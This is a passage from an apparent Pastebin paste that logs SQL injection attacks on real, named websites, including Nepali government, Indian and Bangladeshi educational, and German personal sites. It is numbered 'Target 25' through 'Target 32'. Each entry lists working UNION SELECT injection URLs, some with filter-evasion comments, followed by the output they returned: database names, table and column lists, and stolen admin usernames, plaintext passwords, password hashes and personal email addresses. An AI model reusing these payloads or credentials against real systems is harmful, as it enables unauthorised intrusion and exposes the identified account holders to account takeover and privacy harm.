  585. http://rismfp.gov.np/content.php?id=-326'+/*!50000UNION*/+ALL+SELECT+1,2,3/*!50000,column_name*/,5,6,7,8,9,10,11,12,13,14,15 /*!50000from+*//*!50000information_schema.*//*!50000columns+*/where /*!50000table_name*/ ='usertable' limit 1,5 --+
  586. --> usern
  587.  
  588. http://rismfp.gov.np/content.php?id=-326'+/*!50000UNION*/+ALL+SELECT+1,2,3/*!50000,column_name*/,5,6,7,8,9,10,11,12,13,14,15 /*!50000from+*//*!50000information_schema.*//*!50000columns+*/where /*!50000table_name*/ ='usertable' limit 2,5 --+
  589. --> userp
  590.  
  591. http://rismfp.gov.np/content.php?id=-326'+/*!50000UNION*/+ALL+SELECT+1,2,3/*!50000,userp*/,5,6,7,8,9,10,11,12,13,14,15 /*!50000from*/ usertable--+
  592. -->user : [m@[%}*Fk(ti
  593. --> pass: admin@123
  594.  
  595.  
  596.  
  597. TArget 25:
  598. http://www.meggieschneider.com/php/detail.php?id=-48 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 --+
  599. --> 2,4,5,6,7,8,9
  600.  
  601. http://www.meggieschneider.com/php/detail.php?id=-48 +UNION+ALL+SELECT+1,2,3,group_concat(database(),0x3c62723e ,user(),0x3c62723e,version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 --+
  602. -->
  603. DB383432
  604. U383432@klute.store.d0m.de
  605. 5.6.36-log
  606.  
  607.  
  608. http://www.meggieschneider.com/php/detail.php?id=-48 +UNION+ALL+SELECT+1,2,3,group_concat(table_name,0x3c62723e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from information_schema.tables where table_schema = database()--+
  609. --> ausstellungen,bilder,collaborations,detail,filme,foerderungen,installationen,movies,movies_ausstellungen,movies_installations,participations,preise,serendipity_access,serendipity_authorgroups,serendipity_authors,serendipity_category,serendipity_comments,serendipity_config,
  610. serendipity_entries,serendipity_entrycat,serendipity_entryproperties,serendipity_exits,serendipity_groupconfig,serendipity_groups,serendipity_images,serendipity_mediaproperties,serendipity_options,serendipity_permalinks,serendipity_plugincategories,serendipity_pluginlist,
  611. serendipity_plugins,serendipity_references,serendipity_referrers,serendipity_refs,serendipity_spamblock_htaccess,serendipity_spamblocklog,serendipity_suppress,serendipity_visitors,serendipity_visitors_count,starters,users,verleihe,vita
  612.  
  613. http://www.meggieschneider.com/php/detail.php?id=-48 +UNION+ALL+SELECT+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from information_schema.columns where table_name= 'users'--+
  614. --> ID,user,pass
  615.  
  616. http://www.meggieschneider.com/php/detail.php?id=-48 +UNION+ALL+SELECT+1,2,3,group_concat(user,0x3c62723e,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from users--+
  617. --> meggie
  618. 34857ee0ffba0f1a0f63b09ae823f891
  619.  
  620.  
  621. Target 26:
  622. http://www.tacc.co.il/story.php?id=-9 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8--+
  623. -->2,5
  624.  
  625. http://www.tacc.co.il/story.php?id=-9 +/*!50000UNION*/+ALL+SELECT+1,database(),3,4,5,6,7,8--+
  626. --> oferdr_taccnew
  627. user --> oferdr_root@localhost
  628. version --> 5.5.51-38.2
  629. http://www.tacc.co.il/story.php?id=-9++/*!50000UNION*/+ALL+SELECT+1,/*!12345group_ConcAt(table_name,0x3c62723e)*/,3,4,5,6,7,8 /*!50000from+*/information_schema.tables where table_schema = database()--+
  630. -->ads
  631. ,articles
  632. ,categories
  633. ,galleries
  634. ,homepage
  635. ,interviews
  636. ,links
  637. ,logos
  638. ,pictures
  639. ,press
  640. ,products
  641. ,sismaot
  642. ,sub_top_menu
  643. ,team
  644. ,team_categories
  645. ,top_menu
  646. ,videos
  647.  
  648. http://www.tacc.co.il/story.php?id=-9++/*!50000UNION*/+ALL+SELECT+1,/*!12345group_ConcAt(user,0x3c62723e,pass)*/,3,4,5,6,7,8 /*!50000from+*/sismaot --+
  649. -->dfjdf67utr0ds7urt
  650. --> kjkjk87sdsdk878
  651.  
  652.  
  653. Target 27:
  654. http://www.nwu.edu.bd/news_details.php?id=15%27 +/*!50000UNION*/+ALL+SELECT+user(),2 --+
  655. --> nwuedu_root@localhost
  656. version --> 5.5.51-38.2
  657. http://www.nwu.edu.bd/news_details.php?id=15%27 +/*!50000UNION*/+ALL+SELECT+database(),2 --+
  658. --> nwuedu_web
  659.  
  660.  
  661. http://www.nwu.edu.bd/news_details.php?id=15%27 +/*!50000UNION*/+ALL+SELECT+ /*!12345group_ConcAt(table_name,0x3c62723e)*/,2 /*!50000from+*/information_schema.tables where table_schema = database() --+
  662. --> breaking_news
  663. ,contact
  664. ,content
  665. ,download
  666. ,news_events
  667. ,notice_board
  668. ,passed_student
  669.  
  670. target 28:
  671. http://www.aayojan.edu.in/pune/events_detail.php?id=-5 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10--+
  672. --> 2,8
  673.  
  674. http://www.aayojan.edu.in/pune/events_detail.php?id=-5 +UNION+ALL+SELECT+1,group_concat(database(),user(),version()),3,4,5,6,7,8,9,10--+
  675. --> aayojanpune14
  676. aayojan14@breakside.dreamhost.com
  677. 5.6.34-log
  678.  
  679. http://www.aayojan.edu.in/pune/events_detail.php?id=-5 +UNION+ALL+SELECT+1,group_concat(table_name),3,4,5,6,7,8,9,10 from information_schema.tables where table_schema = database()--+
  680. -->admin_login,assign_panel_menus,assign_panels,manage_user,tbl_addmission,tbl_architecture,tbl_category,tbl_category_work,tbl_contact_us,tbl_content_pages,tbl_course,tbl_events,tbl_homebanner,tbl_largebanner,tbl_links,tbl_news,tbl_notification,tbl_registration,tbl_workdetail,tblcountries
  681.  
  682. http://www.aayojan.edu.in/pune/events_detail.php?id=-5 +UNION+ALL+SELECT+1,group_concat(column_name),3,4,5,6,7,8,9,10 from information_schema.columns where table_name= 'admin_login'--+
  683. -->adminId,username,password,email
  684.  
  685. http://www.aayojan.edu.in/pune/events_detail.php?id=-5 +UNION+ALL+SELECT+1,unhex(hex(group_concat(username,' : ', password,' : ', email))),3,4,5,6,7,8,9,10 from admin_login--+
  686. --> AyojanCMS : AA@13Pune : info@aayojan.edu.in
  687.  
  688. Target 29:
  689. http://www.medep.org.np/index.php?page=page&id=-1 +UNION+ALL+SELECT+1,2,3,4,5,user()--+
  690. -->medeporg_medep@localhost
  691. version()--> 5.5.48-cll
  692. db -->medeporg_medep
  693.  
  694.  
  695.  
  696.  
  697. Target 30:
  698. http://www.avcoe.org/page.php?id=-15 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13--+
  699. --> 5
  700.  
  701. http://www.avcoe.org/page.php?id=-15 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,/*!50000group_conCAT(version(),0x3c62723e,database(),0x3c62723e,user())*/,6,7,8,9,10,11,12,13--+
  702. --> 5.5.51-38.2
  703. avssv_aeng
  704. avssv_aeng@localhost
  705. http://www.avcoe.org/page.php?id=-15 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,/*!50000group_conCAT(table_name,0x3c62723e)*/,6,7,8,9,10,11,12,13 /*!50000from+*/information_schema.tables where table_Schema = database()--+
  706. --> amt_alumni
  707. ,amt_alumnimeet
  708. ,amt_banner
  709. ,amt_blog
  710. ,amt_dept
  711. ,amt_deptov
  712. ,amt_download
  713. ,amt_email
  714. ,amt_events
  715. ,amt_footerlogo
  716. ,amt_footertext
  717. ,amt_gallery
  718. ,amt_logo
  719. ,amt_menu
  720. ,amt_page
  721. ,amt_plinks
  722. ,amt_quicklinks
  723. ,amt_recimg
  724. ,amt_recruiter
  725. ,amt_slide
  726. ,amt_slider
  727. ,amt_smenu
  728. ,amt_socialicon
  729. ,amt_uploadimg
  730. ,amt_webnm
  731. ,rss_login
  732. ,test
  733.  
  734. http://www.avcoe.org/page.php?id=-15 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,/*!50000group_conCAT(column_name,0x3c62723e)*/,6,7,8,9,10,11,12,13 /*!50000from+*/information_schema.columns where table_name= 'rss_login'--+
  735. --> u_id
  736. ,u_date
  737. ,u_name
  738. ,u_pwd
  739. ,u_role
  740. ,u_block
  741. ,u_purpose
  742. ,u_pages
  743.  
  744.  
  745. http://www.avcoe.org/page.php?id=-15 +/*!50000UNION*/+ALL+SELECT+1,2,3,4,/*!50000group_conCAT(u_name,' : ',u_pwd,0x3c62723e)*/,6,7,8,9,10,11,12,13 /*!50000from+*/ rss_login--+
  746. --> EngAdmin : b512aeaa378b7365c54ee7bb6de633d0
  747. ,sinhaamol@yahoo.com : b2900d0f43934c5a935775b3198feed1
  748. ,sachin.thanekar@yahoo.co.in : sachin@123
  749. ,Shailesh1986 : e0fc28d1eafc198924824175bcc8e114
  750. ,avinashtambe : a1bc6f8c372affb323bf04e37a7310ae
  751. ,aemba : 2471e6c96d191bda48421a0bdd1a3f96
  752. ,gadakh_vijay : 1b3b293dd7a3b09b32f071b6d7c25a1b
  753. ,avcoeelectrical : 7e69238d375fd6d04b002c9a5f0bde67
  754. ,Civildept : d4708487562d467e13d73098fac22623
  755. ,yogeshwar : 2104a6707e7d44b5376f5ad30f1b0ed4
  756. ,sujata.kolekar@gmail.com : 7d801e575202293d82b7f3caf0cf6cc6
  757. ,ashwini.ashu051192@gmail.com : 639bf7cc718bfcebd676eacd962aa077
  758. ,pramod23gunjal@gmail.com : bc3ba1449b7fca1795712c448ec99c97
  759. ,jdhananjayan@gmail.com : 661649a55c18df4e4632917edfdf422c
  760. ,nileshnagarkar@yahoo.com : adee5e67419f86f8a23435960e11689c
  761. ,mrunalfatangare@gmail.com : ce3b43bce6b415f7d3a8fae4af1fb4d7
  762. ,haribhau88@gmail.com : ae6cf7ae724cbe96deb83bb98bc21430
  763. ,kavitapagire : 70deb95e27ef5143b0fd0904c6031200
  764. ,prashant.pawar.in@g
  765.  
  766.  
  767. Target 31;
  768. http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+1,2--+
  769. -->1
  770.  
  771. http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+group_concat(version(),0x3c62723e,database(),0x3c62723e,user()),2--+
  772. --> 5.6.35
  773. hypreko_prekon
  774. hypreko_prekon@localhost
  775.  
  776.  
  777. http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+unhex(hex(table_name)),2 from information_schema.tables where table_schema = database()--+
  778. banners
  779. bottom_content
  780. categorys
  781. contact_content
  782. contact_email
  783. gallery
  784. gallery_categorys
  785. images
  786. latest_projects
  787. news
  788. ongoing_projects
  789. pages
  790. photogallery
  791. php_admin
  792. tbl_ip
  793.  
  794. http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+unhex(hex(column_name)),2 from information_schema.columns where table_name= 'php_admin'--+
  795. -->
  796. admin_id
  797. admin_fname
  798. admin_lname
  799. admin_password
  800. admin_email
  801. admin_cdate
  802. admin_status
  803.  
  804. http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+admin_password,2 from php_admin--+
  805. --> vizag@123
  806. http://prekonconstructions.in/gallery_view.php?id=-9 +UNION+ALL+SELECT+admin_email,2 from php_admin--+
  807. -->admin
  808.  
  809.  
  810.  
  811. Target 32
  812. http://www.nnl.gov.np/content.php?id=-16' +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
  813. --> 4,8
  814.  
  815. http://www.nnl.gov.np/content.php?id=-16' +UNION+ALL+SELECT+1,2,3,group_concat(version(),0x20,database(),0x20,user()),5,6,7,8,9,10,11,12,13,14,15--+
  816. --> 5.5.52-cll nnlgov_dbase nnlgov_front@localhost
  817.  
  818. http://www.nnl.gov.np/content.php?id=-16' +UNION+ALL+SELECT+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema = database()--+
  819. -->gallery,gallerydetails,rightphoto,tblbanner,tblbhuktani,tblcontacts,tbldownloadgroup,tbldownloads,tblevents,tblfaq,tblfaq_cat,tblgrantgroup,tblgrants,tbljingle,tbllinks,tblmain,tblmenu,tblnews,tblnotice,tblrti,tblrtigroup,tbluploads,tblvideo,usertable,whoiswho
  820.  
  821.  
  822. http://www.nnl.gov.np/content.php?id=-16' +UNION+ALL+SELECT+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name= 'usertable'--+
  823. --> userid,usern,userp
  824.  
  825. http://www.nnl.gov.np/content.php?id=-16' +UNION+ALL+SELECT+1,2,3,group_concat(usern,0x203a,userp,0x3c62723e),5,6,7,8,9,10,11,12,13,14,15 from usertable--+
  826. --> admin@123 :#clv0&sRfR2k
  827. account :account@123#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!